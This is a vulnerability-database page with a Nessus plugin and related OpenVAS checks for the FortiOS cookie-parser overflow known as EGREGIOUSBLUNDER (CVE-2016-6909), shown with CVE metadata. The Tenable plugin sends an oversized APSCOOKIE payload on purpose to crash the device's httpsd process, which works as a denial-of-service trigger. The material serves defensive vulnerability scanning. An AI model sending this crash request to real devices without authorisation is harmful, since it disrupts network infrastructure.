

Fortinet FortiOS Web Interface Cookie Parser RCE (EGREGIOUSBLUNDER)

2016-08-29T00:00:00
ID FORTIOS_COOKIE_PARSING_BOF.NASL
Type nessus
Reporter This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.
Modified 2021-02-02T00:00:00

Description

The Fortinet FortiOS management console running on the remote host is affected by a remote code execution vulnerability, known as EGREGIOUSBLUNDER, in its web interface due to improper validation when parsing cookies. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to cause a buffer overflow condition, resulting in a denial of service condition or the execution of arbitrary code.

EGREGIOUSBLUNDER is one of multiple Equation Group vulnerabilities and exploits disclosed on 2016/08/14 by a group known as the Shadow Brokers.

Note that this plugin attempts to terminate the httpsd process, which appears to restart afterwards. Additionally, this plugin requires report paranoia because it relies on the absence of a server response to indicate a vulnerable status, which is not necessarily a reliable indicator.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  # Plugin identity and revision metadata.
  script_id(93196);
  script_version("1.7");
  script_cvs_date("Date: 2018/11/15 20:50:17");

  # External identifiers for the underlying vulnerability and public exploit.
  script_cve_id("CVE-2016-6909");
  script_bugtraq_id(92523);
  script_xref(name:"EDB-ID", value:"40276");

  # The summary describes what the check really does: it tries to make the
  # remote httpsd terminate, rather than fingerprinting a version.
  script_name(english:"Fortinet FortiOS Web Interface Cookie Parser RCE (EGREGIOUSBLUNDER)");
  script_summary(english:"Tries to terminate the remote httpsd.");

  # Report text. The description carries the operational caveats: the
  # target's httpsd may be killed (it appears to restart), and the verdict
  # rests on a missing response, so paranoid reporting is required.
  script_set_attribute(attribute:"synopsis", value:
"A web-based management console running on the remote host is affected
by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Fortinet FortiOS management console running on the remote host
is affected by a remote code execution vulnerability, known as
EGREGIOUSBLUNDER, in its web interface due to improper validation when
parsing cookies. An unauthenticated, remote attacker can exploit this,
via a specially crafted HTTP request, to cause a buffer overflow
condition, resulting in a denial of service condition or the execution
of arbitrary code.

EGREGIOUSBLUNDER is one of multiple Equation Group vulnerabilities and
exploits disclosed on 2016/08/14 by a group known as the Shadow
Brokers.

Note that this plugin attempts to kill the httpsd process, which
appears to restart after termination. Additionally, this plugin
requires report paranoia as it relies on a missing server response to
indicate a vulnerable status, which may or may not be reliable.");
  script_set_attribute(attribute:"see_also", value:"https://fortiguard.com/psirt/FG-IR-16-023");
  # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?4c7e0cf3");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Fortinet FortiOS 4.1.11 / 4.2.13 / 4.3.9 / 5.0 or later.");
  # CVSS v2 and v3 base/temporal scoring.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:X");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  # Disclosure / patch / plugin timeline.
  script_set_attribute(attribute:"vuln_publication_date", value:"2016/08/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/08/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/08/29");

  # Classification: a remote (network) check against the FortiOS CPE, flagged
  # as a potential vulnerability because the indicator is indirect.
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fortinet:fortios");
  script_set_attribute(attribute:"in_the_news", value:"true");
  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_end_attributes();

  # Destructive category: the check may terminate the target's httpsd.
  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.");

  # Runs only after FortiOS UI detection succeeded and only when the scan
  # policy has paranoid reporting enabled.
  script_dependencies("fortigate_detect.nasl");
  script_require_keys("www/fortios_ui", "Settings/ParanoidReport");
  script_require_ports("Services/www", 443);

  # Registration pass ends here; the check body below runs otherwise.
  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");

# The verdict below rests on the absence of a server response, which is a
# weak indicator; only proceed when the scan policy accepts paranoid reports.
if (report_paranoia < 2)
  audit(AUDIT_PARANOID);

# Stop unless the FortiOS web UI was detected on this host.
get_kb_item_or_exit("www/fortios_ui");

# Management interface port (TLS expected, 443 by default).
port = get_http_port(default:443, embedded: TRUE);

# Plain-text ports are skipped: the management UI is only tested over HTTPS.
transport = get_port_transport(port);
if (ENCAPS_IP == transport)
  exit(0, "Not testing non-https port " + port + ".");

# Installation details recorded by the detection plugin, used for reporting.
app_name = "FortiOS Web Interface";
install = get_install_from_kb(appname:'fortios_ui', port:port, exit_on_fail:TRUE);
dir = install['dir'];
report_url = build_url(port:port, qs:dir);


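#
# Request 1: Learn the name of the session cookie (APSCOOKIE_<suffix>) that
# the login page sets, so the following requests carry a cookie the parser
# will actually process.
#
res = http_send_recv3(
  method:'GET',
  item:'/login',
  port:port,
  exit_on_fail:TRUE
  );

# Capture everything from "APSCOOKIE" up to, but not including, the first '='.
# The previous pattern used a PCRE-style lazy quantifier ("*?"); that sequence
# is undefined in POSIX ERE, which eregmatch() uses, and is commonly treated
# as greedy, which could extend the capture past the first '='. A negated
# character class stops at the first '=' under any engine.
matches = eregmatch(string: res[1], pattern:"(APSCOOKIE[^=]*)=");
if (isnull(matches) || isnull(matches[1]))
  exit(1, "Failed to get APSCOOKIE name.");

cookie_name = matches[1];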

url = "/index";

#
# Request 2: Baseline request carrying a cookie value of a length the parser
# handles normally. exit_on_fail stops the plugin here if the UI does not
# answer, so a dead or unreachable service is never mistaken for a crash
# caused by the next request.
#
baseline_value = crap(data:'A', length: 0x1000);
cookie_good = cookie_name + '=Era=0&Payload=' + baseline_value;

res = http_send_recv3(
  method:'POST',
  item:url,
  port:port,
  add_headers: make_array("Cookie", cookie_good),
  exit_on_fail: TRUE 
  );

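#
# Request 3: Send an over-length cookie value. On an unpatched device this is
# expected to terminate httpsd, in which case no response comes back.
#
cookie_bad = cookie_name + 
'=Era=0&Payload=' +
crap(data:'A', length: 0x1100); 

res = http_send_recv3(
  method:'POST',
  item:url,
  port:port,
  add_headers: make_array("Cookie", cookie_bad)
  );

# Captured immediately so the report shows exactly the request that was sent.
req = http_last_sent_request();

# The documented indicator is a *missing* response, so the verdict keys on
# whether any response (status line) was received rather than on a non-empty
# body: a legitimate reply with an empty body (a redirect, for instance)
# must not be reported as vulnerable.
if (!isnull(res) && !isnull(res[0]))
{
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, report_url);
}
else
{
  security_report_v4(port:    port, 
                    severity: SECURITY_HOLE, 
                    generic:  TRUE,
                    request:  make_list(req)
                    );
}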

                                        
                                    


{"id": "FORTIOS_COOKIE_PARSING_BOF.NASL", "bulletinFamily": "scanner", "title": "Fortinet FortiOS Web Interface Cookie Parser RCE (EGREGIOUSBLUNDER)", "description": "The Fortinet FortiOS management console running on the remote host\nis affected by a remote code execution vulnerability, known as\nEGREGIOUSBLUNDER, in its web interface due to improper validation when\nparsing cookies. An unauthenticated, remote attacker can exploit this,\nvia a specially crafted HTTP request, to cause a buffer overflow\ncondition, resulting in a denial of service condition or the execution\nof arbitrary code.\n\nEGREGIOUSBLUNDER is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2016/08/14 by a group known as the Shadow\nBrokers.\n\nNote that this plugin attempts to kill the httpsd process, which\nappears to restart after termination. Additionally, this plugin\nrequires report paranoia as it relies on a missing server response to\nindicate a vulnerable status, which may or may not be reliable.", "published": "2016-08-29T00:00:00", "modified": "2021-02-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/93196", "reporter": "This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.", "references": ["http://www.nessus.org/u?4c7e0cf3", "https://fortiguard.com/psirt/FG-IR-16-023"], "cvelist": ["CVE-2016-6909"], "type": "nessus", "lastseen": "2021-02-01T02:44:43", "edition": 27, "viewCount": 1665, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-6909"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105875", "OPENVAS:1361412562310105886"]}, {"type": "zdt", "idList": ["1337DAY-ID-25265"]}, {"type": "nessus", "idList": ["FORTIOS_FG-IR-16-023.NASL"]}], "modified": "2021-02-01T02:44:43", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-02-01T02:44:43", "rev": 2}, "vulnersScore": 7.7}, "sourceData": "#\n# (C) Tenable 
Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93196);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:17\");\n\n script_cve_id(\"CVE-2016-6909\");\n script_bugtraq_id(92523);\n script_xref(name:\"EDB-ID\", value:\"40276\");\n\n script_name(english:\"Fortinet FortiOS Web Interface Cookie Parser RCE (EGREGIOUSBLUNDER)\");\n script_summary(english:\"Tries to terminate the remote httpsd.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web-based management console running on the remote host is affected\nby a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Fortinet FortiOS management console running on the remote host\nis affected by a remote code execution vulnerability, known as\nEGREGIOUSBLUNDER, in its web interface due to improper validation when\nparsing cookies. An unauthenticated, remote attacker can exploit this,\nvia a specially crafted HTTP request, to cause a buffer overflow\ncondition, resulting in a denial of service condition or the execution\nof arbitrary code.\n\nEGREGIOUSBLUNDER is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2016/08/14 by a group known as the Shadow\nBrokers.\n\nNote that this plugin attempts to kill the httpsd process, which\nappears to restart after termination. 
Additionally, this plugin\nrequires report paranoia as it relies on a missing server response to\nindicate a vulnerable status, which may or may not be reliable.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://fortiguard.com/psirt/FG-IR-16-023\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Fortinet FortiOS 4.1.11 / 4.2.13 / 4.3.9 / 5.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fortinet:fortios\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"fortigate_detect.nasl\");\n script_require_keys(\"www/fortios_ui\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 443);\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\n# Use lack of response to flag vulnerability is not so reliable\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# FortiOS web gui not detected\nget_kb_item_or_exit(\"www/fortios_ui\");\n\nport = get_http_port(default:443, embedded: TRUE);\n\n# Do https only\nif(get_port_transport(port) == ENCAPS_IP)\n exit(0, \"Not testing non-https port \" + port + \".\");\n\napp_name = \"FortiOS Web Interface\";\ninstall = get_install_from_kb(appname:'fortios_ui', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nreport_url = build_url(port:port, qs:dir);\n\n\n#\n# Request 1: Get the cookie name to use \n#\nres = http_send_recv3(\n method:'GET',\n item:'/login',\n port:port,\n exit_on_fail:TRUE\n );\n\nmatches = eregmatch(string: res[1], pattern:\"(APSCOOKIE.*?)=\");\nif(matches)\n{\n cookie_name = matches[1];\n}\nelse\n{\n exit(1, \"Failed to get APSCOOKIE name.\");\n}\n\nurl = \"/index\";\n\n#\n# Request 2: Test with a cookie having a valid length\n#\ncookie_good = cookie_name + \n'=Era=0&Payload=' +\ncrap(data:'A', length: 0x1000);\n\nres = http_send_recv3(\n method:'POST',\n item:url,\n port:port,\n add_headers: make_array(\"Cookie\", cookie_good),\n exit_on_fail: TRUE \n );\n\n#\n# Request 3: Attempt to kill httpsd\n#\ncookie_bad = cookie_name + \n'=Era=0&Payload=' +\ncrap(data:'A', length: 0x1100); \n\nres = http_send_recv3(\n method:'POST',\n item:url,\n port:port,\n add_headers: make_array(\"Cookie\", cookie_bad)\n );\n\nreq = http_last_sent_request();\n\nif(res[2])\n{\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, report_url);\n}\nelse\n{\n security_report_v4(port: port, \n severity: SECURITY_HOLE, \n generic: TRUE,\n request: make_list(req)\n );\n}\n", "naslFamily": "CGI abuses", "pluginID": "93196", "cpe": ["cpe:/o:fortinet:fortios"], "scheme": null, "cvss3": {"score": 9.8, 
"vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}
{"cve": [{"lastseen": "2021-02-02T06:28:10", "description": "Buffer overflow in the Cookie parser in Fortinet FortiOS 4.x before 4.1.11, 4.2.x before 4.2.13, and 4.3.x before 4.3.9 and FortiSwitch before 3.4.3 allows remote attackers to execute arbitrary code via a crafted HTTP request, aka EGREGIOUSBLUNDER.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-08-24T16:30:00", "title": "CVE-2016-6909", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6909"], "modified": "2019-05-22T15:06:00", "cpe": ["cpe:/o:fortinet:fortiswitch:3.4.2"], "id": "CVE-2016-6909", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6909", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:fortinet:fortiswitch:3.4.2:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:35:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6909"], "description": "FortiGate firmware (FOS) released before Aug 2012 has a cookie parser buffer overflow vulnerability.", "modified": "2018-10-25T00:00:00", "published": 
"2016-08-18T00:00:00", "id": "OPENVAS:1361412562310105875", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105875", "type": "openvas", "title": "FortiOS: Cookie Parser Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fortigate_FG-IR-16-023.nasl 12096 2018-10-25 12:26:02Z asteins $\n#\n# FortiOS: Cookie Parser Buffer Overflow Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:fortinet:fortigate\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105875\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12096 $\");\n script_cve_id(\"CVE-2016-6909\");\n\n script_name(\"FortiOS: Cookie Parser Buffer Overflow Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://fortiguard.com/psirt/FG-IR-16-023\");\n\n script_tag(name:\"impact\", value:\"This vulnerability, when exploited by a crafted HTTP request, can result in execution control being taken over.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"solution\", value:\"Upgrade to release 5.x.\nUpgrade to release 4.3.9 or above for models not compatible with FortiOS 5.x.\");\n\n script_tag(name:\"summary\", value:\"FortiGate firmware (FOS) released before Aug 2012 has a cookie parser buffer overflow vulnerability.\");\n\n script_tag(name:\"affected\", value:\"FortiGate (FOS):\n\n4.3.8 and below\n\n4.2.12 and below\n\n4.1.10 and below\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 14:26:02 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-18 11:05:04 +0200 (Thu, 18 Aug 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"FortiOS Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n 
script_dependencies(\"gb_fortigate_version.nasl\");\n script_mandatory_keys(\"fortigate/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) ) exit( 0 );\n\nif( version =~ \"^4\\.1\\.\" ) fix = '4.1.11';\nif( version =~ \"^4\\.2\\.\" ) fix = '4.2.13';\nif( version =~ \"^4\\.3\\.\" ) fix = '4.3.9';\n\nif( ! fix ) exit( 99 );\n\nif( version_is_less( version:version, test_version:fix ) )\n{\n report = report_fixed_ver( installed_version:version, fixed_version:fix );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T17:21:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6909"], "description": "FortiGate firmware (FOS) released before Aug 2012 has a cookie parser buffer overflow vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2016-09-06T00:00:00", "id": "OPENVAS:1361412562310105886", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105886", "type": "openvas", "title": "FortiOS: Cookie Parser Buffer Overflow Vulnerability (remote check)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# FortiOS: Cookie Parser Buffer Overflow Vulnerability (remote check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105886\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2016-6909\");\n script_name(\"FortiOS: Cookie Parser Buffer Overflow Vulnerability (remote check)\");\n\n script_xref(name:\"URL\", value:\"https://fortiguard.com/psirt/FG-IR-16-023\");\n\n script_tag(name:\"impact\", value:\"This vulnerability, when exploited by a crafted HTTP request, can result in execution control being taken over.\");\n\n script_tag(name:\"vuldetect\", value:\"Check the Etag\");\n\n script_tag(name:\"solution\", value:\"Upgrade to release 5.x.\nUpgrade to release 4.3.9 or above for models not compatible with FortiOS 5.x.\");\n\n script_tag(name:\"summary\", value:\"FortiGate firmware (FOS) released before Aug 2012 has a cookie parser buffer overflow vulnerability.\");\n\n script_tag(name:\"affected\", value:\"FortiGate (FOS):\n\n4.3.8 and below\n\n4.2.12 and below\n\n4.1.10 and below\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-09-06 11:28:49 +0200 (Tue, 06 Sep 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 
443);\n script_mandatory_keys(\"ETag/banner\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\ninclude(\"misc_func.inc\");\n\nport = http_get_port( default:443 );\n\nbanner = http_get_remote_headers( port:port );\nif( ! banner || \"ETag\" >!< banner ) exit( 0 );\n\netag = eregmatch( pattern:'ETag: \"([^\"]+)\"', string:banner );\nif( isnull(etag[1] ) ) exit( 0 );\n\netag = split( etag[1], sep:\"-\", keep:FALSE );\nif( ( max_index( etag ) < 3 ) ) exit( 0 );\n\net = etag[2];\nif( strlen( et ) != 8 ) exit( 0 );\n\netags = make_list( \"44443fd4\",\"44c526c5\",\"45a3ea60\",\"45baacf4\",\"45f0af67\",\"47e0669f\",\"468abbad\",\"46c6166d\",\n \"46df457c\",\"4602cf97\",\"463b99a6\",\"468cad93\",\"46d9607c\",\"47b355de\",\"489129e7\",\"443ede0d\",\n \"44c52c4f\",\"452184d7\",\"45a3f01e\",\"45bab263\",\"45f0b580\",\"4602cfe5\",\"463b9965\",\"468cbb86\",\n \"46d9672a\",\"471d2e73\",\"47b355da\",\"47e06d95\",\"48912069\",\"468ac1d0\",\"46a7ad09\",\"46c61f79\",\n \"46df4da9\",\"4717beff\",\"474b9480\",\"47bcda2f\",\"48b30fac\",\"490bb64e\",\"47a3f4ee\",\"47df4682\",\n \"482b72f5\",\"488fa68e\",\"49064b4d\",\"49ae1d20\",\"487e7a57\",\"48d43154\",\"49273663\",\"49ade40f\",\n \"49c45c70\",\"49dd033a\",\"4a4a955b\",\"4ace863a\",\"4b3185d6\",\"4b7c8347\",\"4cc1d9e0\",\"4a384886\",\n \"4b0f40be\",\"4a8de859\",\"4ade3518\",\"4b318abd\",\"4b58d924\",\"4ba3e7e6\",\"4c22a3f3\",\"4c2a8446\",\n \"4c88306f\",\"4ca38e08\",\"4d435410\",\"4dfaabba\",\"ff80c272\",\"ff80c279\",\"4c74581f\",\"4d083087\",\n \"4d6d53b0\",\"4d93bdf9\",\"4dae0eb8\",\"4dd6af49\",\"4e2496ed\",\"4d84169e\",\"4e090fe3\",\"44443ed6\",\n \"44c52afa\",\"4522b784\",\"45500063\",\"45a3f02e\",\"45bab272\",\"45f0ba4d\",\"460d7a1f\",\"463aa4d2\",\n \"46806d0b\",\"46cb9bfc\",\"47e06dbe\",\"48913626\",\"45948af9\",\"45a6f4c1\",\"45ba73c7\",\"45f1c561\",\n \"460d88a0\",\"468ac251\",\"468321e2\",\"46c61fcf\",\"46df4e86\",\"4717c14d\",\"474b9d17\",\"47bcdc5c\",\n 
\"48b312ee\",\"490bb6a0\",\"47a3f5a7\",\"47df4721\",\"482b7090\",\"488faa33\",\"49064b4b\",\"49ae254b\",\n \"49ffa204\",\"487e7ecc\",\"48d43248\",\"492737d4\",\"49adeaae\",\"49c45cd3\",\"49dd05b9\",\"4a4aec23\",\n \"4acfd94e\",\"4b328455\",\"4b7c709c\",\"4cc85189\",\"499f3750\",\"49db8b32\",\"4a37e55a\",\"4b16d0ce\",\n \"4a8de79b\",\"4ade32fe\",\"4b318bb4\",\"4b58d9e4\",\"4ba3e887\",\"4c22a8f5\",\"4c2a8e5f\",\"4c882f51\",\n \"4ca39510\",\"4d4359e1\",\"4dfab1c1\",\"ff2a0272\",\"ff2a0279\",\"4c746630\",\"4d083771\",\"4d6d57f7\",\n \"4d93c93e\",\"4dae1c33\",\"4dd6be44\",\"4e24a35c\",\"4d8404a9\",\"4e08fc94\",\"443ed96e\",\"44c52523\",\n \"4522a9b7\",\"454ff829\",\"45a3eee4\",\"45baafe1\",\"45f0b528\",\"460d78e2\",\"463a9d82\",\"468066d7\",\n \"46cb9803\",\"47e06db5\",\"48913369\",\"45948486\",\"45a6ed51\",\"45ba6c80\",\"45f1bee7\",\"460d84ba\",\n \"468ac195\",\"46831ae7\",\"46c61d81\",\"46df4be9\",\"4717b955\",\"474b9368\",\"47bce039\",\"48b309de\",\n \"490bb553\",\"47a3eb7d\",\"47df39f8\",\"482b665b\",\"488f9d9e\",\"49063f0f\",\"49ae0f61\",\"49ff87ee\",\n \"487e6e64\",\"48d42a0e\",\"49272ac0\",\"49adcf83\",\"49c4428a\",\"49dcea97\",\"4a4ac8a2\",\"4acfb690\",\n \"4b329ac9\",\"4b7c0774\",\"4cc85360\",\"499f36b3\",\"49db8a40\",\"4a37e407\",\"4b16ce6b\",\"4a8de5fb\",\n \"4ade33db\",\"4b318b1d\",\"4b58d915\",\"4ba3e740\",\"4c22a3f3\",\"4c2a87f3\",\"4c88270e\",\"4ca3911b\",\n \"4d4348f3\",\"4dfaabc1\",\"ff3a0272\",\"ff3a0279\",\"4c745c40\",\"4d082d04\",\"4d6d537d\",\"4d93ba56\",\n \"4dae0ccf\",\"4dd6af6d\",\"4e2496d3\",\"4d83fb16\",\"4e08f34e\",\"45218416\",\"454ffff6\",\"45a3f2a2\",\n \"45bab65e\",\"45f0bb96\",\"482b785e\",\"490651ca\",\"487e7fcd\",\"48d438a9\",\"49273e0c\",\"49adecc7\",\n \"49c471d3\",\"49dd07b8\",\"4a4aeee3\",\"499f381f\",\"49db8b9d\",\"4a37e5ed\",\"4b16d150\",\"4a8de874\",\n \"4ade3634\",\"4b318c6f\",\"4b58da4a\",\"4ba3ea3a\",\"4c22abac\",\"4c2a8b64\",\"4c88304b\",\"4ca394e0\",\n 
